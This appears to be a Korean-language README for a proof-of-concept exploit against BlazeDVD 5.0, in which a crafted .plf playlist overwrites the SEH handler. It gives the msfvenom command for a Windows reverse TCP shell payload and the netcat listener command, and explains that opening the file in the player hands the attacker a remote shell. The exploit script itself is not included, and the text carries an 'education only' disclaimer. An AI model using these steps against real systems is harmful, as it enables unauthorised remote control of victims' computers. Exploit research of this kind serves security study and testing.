
BlazeDVD 5.0용 SEH 버퍼 오버플로우 개념 증명 익스플로잇으로, 조작된 .plf 재생 목록 파일을 통해 리버스 셸 페이로드를 msfvenom으로 생성하여 교육적인 보안 연구를 위한 것입니다.
BlazeDVD 5.0에서 조작된 .plf 재생목록 파일을 통해 발생하는 버퍼 오버플로우 취약점을 대상으로 한 개념 증명(PoC) 익스플로잇입니다. 이 익스플로잇은 SEH(구조적 예외 처리기) 덮어쓰기를 사용하여 코드 실행을 달성합니다.
.plf 파일을 통한 버퍼 오버플로우이 코드는 교육 및 연구 목적으로만 제공됩니다. 이 코드의 오용은 현지 또는 국제 법률을 위반할 수 있습니다. 부적절한 사용으로 인한 피해에 대해 저는 책임을 지지 않습니다.
이 익스플로잇은 악성 .plf 파일을 생성하며, BlazeDVD에서 열릴 때 버퍼 오버플로우를 트리거하고 SEH(구조적 예외 처리기)를 덮어쓰기하여 실행 흐름을 리버스 셸 페이로드로 리디렉션합니다.
msfvenom으로 셸코드 생성
msfvenom을 사용하여 리버스 셸 페이로드를 raw 형식으로 생성하고, 나쁜 문자를 회피합니다.
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=8443 EXITFUNC=thread -b "\x00\x0a\x0d" -f c
익스플로잇 스크립트 내의 셸코드를 msfvenom의 출력으로 교체합니다.
Netcat (리스너) 시작
다른 터미널에서 선택한 포트 8443에서 리스닝을 시작합니다:
nc -lvnp 8443
리버스 셸 획득
성공하면 리버스 셸이 리스너에 연결됩니다.